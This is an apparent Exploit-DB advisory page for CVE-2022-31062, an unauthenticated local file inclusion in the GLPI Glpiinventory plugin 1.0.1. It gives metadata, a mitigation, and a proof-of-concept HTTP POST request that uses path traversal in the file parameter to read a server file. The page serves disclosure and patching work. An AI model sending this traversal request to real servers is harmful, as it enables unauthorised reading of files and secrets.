GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion

vendor:

GLPI Glpiinventory

by:

Nuri Çilengir

7.5

CVSS

HIGH

Unauthenticated Local File Inclusion

CWE

Product Name: GLPI Glpiinventory

Affected Version From: GLPI Glpiinventory <= 1.0.1

Affected Version To: GLPI Glpiinventory >= 1.0.2

Patch Exists: YES

Related CWE: CVE-2022-31062

CPE: a:glpi_project:glpiinventory:1.0.1

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2022

GLPI Glpiinventory v1.0.1 – Unauthenticated Local File Inclusion

The GLPI Glpiinventory plugin version 1.0.1 is vulnerable to unauthenticated local file inclusion. An attacker can exploit this vulnerability to read arbitrary files from the server.

Mitigation:

Update to the latest version of the GLPI Glpiinventory plugin (>= 1.0.2) or apply the vendor-supplied patch.

Source

Exploit-DB raw data:

# ADVISORY INFORMATION
# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion  
# Date of found: 11 Jun 2022
# Application: GLPI Glpiinventory <= 1.0.1
# Author: Nuri Çilengir 
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi-inventory-plugin
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31062

# PoC
POST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1